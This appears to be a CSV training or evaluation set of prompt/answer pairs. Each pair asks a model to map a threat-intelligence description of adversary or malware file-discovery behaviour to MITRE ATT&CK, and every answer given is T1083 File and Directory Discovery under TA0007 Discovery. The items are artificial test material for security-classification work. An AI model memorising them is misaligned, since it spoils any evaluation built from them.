+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the BLOODMINE utility to discover files with .css, .jpg, .png, .gif, .ico, .js, and .jsp extensions in Pulse Secure Connect logs.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has run scripts to identify file formats including Microsoft Word.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has utilized multiple commands to identify data of interest in file and directory listings.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal collected file listings of all default Windows directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used malware that searched for files with specific patterns.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used a batch script to gather folder and file names from victim hosts.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used the Windows `dir` command to enumerate files and directories in a victim's network.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used WizTree to obtain network files and directory listings.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has searched file contents on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception used a file listing plugin to collect information about file and directories both on local and remote drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang uses command-line interaction to search files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has the ability to enumerate all files and directories on an infected system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used malware that scans for files in the Documents, Desktop, and Download folders and in other drives.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords ""Kasper,"" ""Panda,"" or ""ESET.""","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has enumerated files on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider Spider enumerates a target organization for files and directories of interest, including source code.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used malware to collect information on files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has run scripts to enumerate recently modified documents having either a .pdf, .doc, .docx, .xls or .xlsx extension.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has monitored files' modified time.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the lPH*.dll pattern.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has used a script to check for the presence of files created by OpenSSH backdoors.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: dir c:\ >> %temp%\download dir ""c:\Documents and Settings"" >> %temp%\download dir ""c:\Program Files\"" >> %temp%\download dir d:\ >> %temp%\download","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 4H RAT has the capability to obtain file and directory listings.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can list files and directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AcidRain identifies specific files and directories in the Linux operating system associated with storage devices.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT has the ability to collect drive and file information on an infected machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira examines files prior to encryption to determine if they meet requirements for encryption and can be encrypted by the ransomware. These checks are performed through native Windows functions such as GetFileAttributesW.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has searched for folders associated with antivirus software.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to gather metadata from a file and to search for file and directory names.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred can search through folders and files on the system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has searched for specific files prior to encryption.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to browse files in directories such as Program Files and the Desktop.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has searched for files and directories on a compromised network.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can recursively search for files in folders and collects files from the desktop with certain extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE allows adversaries to search for files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has searched for files on the infected host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can list file and directory information.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE has the capability to enumerate files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN can search, read, write, move, and execute files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can enumerate files and collect associated metadata.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk has the ability to enumerate files on a targeted system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has used dir to search for ""programfiles"" and ""appdata"".","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to identify folders and files related to previous infections.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch searches for files with specific file extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has a command to list files on a system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot searches for files on the victim's machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can enumerate the victim's desktop.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal can retrieve a file listing from the system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can enumerate specific files for encryption.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can enumerate files for encryption.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. BlackEnergy has searched for given file types.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackMould has the ability to find files on the targeted system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can search for specific files and directories on a machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon has searched for files on the system, such as documents located in the desktop folder.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brave Prince gathers file and directory information from the victim’s machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An older version of CHOPSTICK has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER will survey the contents of system files during installation.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORALDECK searches for specified files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper can enumerate all files and directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can obtain victim drive information as well as a list of folders in C:\Program Files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can search for files in directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes collects the victim's %TEMP% directory path and version of Internet Explorer.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cheerscrypt can search for log and VMware-related files with .log, .vmdk, .vmem, .vswp, and .vmsn extensions.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component can list directory contents.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can browse directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop has searched folders and subfolders for files to encrypt.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can explore files on a compromised system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can discover files on a local system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has looked for files in the user's home directory with ""wallet"" in their name using find.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can discover specified filetypes and log files on a targeted system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can specify the local file path to upload files from.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrossRAT can list all files on a system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic can scan a directory to identify files for deletion.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can enumerate files by using a variety of functions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DDKONG lists files on the victim’s machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM can use loop operations to enumerate directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can scan directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some versions of DarkGate search for the hard-coded folder C:\Program Files\e Carte Bleue.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has the ability to enumerate file and folder names.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis has several commands to search directories for files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of obtaining directory, file, and drive listings.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has a command to traverse the files and directories in a given path.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has resolved the path of a process PID to use as a script argument.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook can collect the names of all files and folders in the Program Files directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can list files on available disk volumes.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ELMER is capable of performing directory listings.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can list directory entries.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A variant of Elise executes dir C:\progra~1 when initially run.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire includes various modules for finding files of interest on hosts and network shares.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL can search files on a victim.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FYAnti can search the C:\Windows\Microsoft.NET\ directory for files of a specified size.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can enumerate directories on target machines.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher enumerates directories and scans for certain files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Forfiles can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly looks for specific files and file types.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has the ability to search for files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization/Sandbox Evasion.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon lists the directories for Desktop, program files, and the user’s recently accessed files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has included a program ""ExeProtector"", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has the ability to enumerate files and directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has been observed enumerating system drives and partitions.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser is capable of listing files, folders, and drives on a victim.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can enumerate common folders such as My Documents, Desktop, and AppData.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor has the ability to search the compromised host for files.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer’s data wiper component enumerates specific files on all the Windows drives.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT enumerates directories and obtains file attributes on a system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe can list file and directory information.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE has a command to search for files on the victim’s machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can enumerate files and directories on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
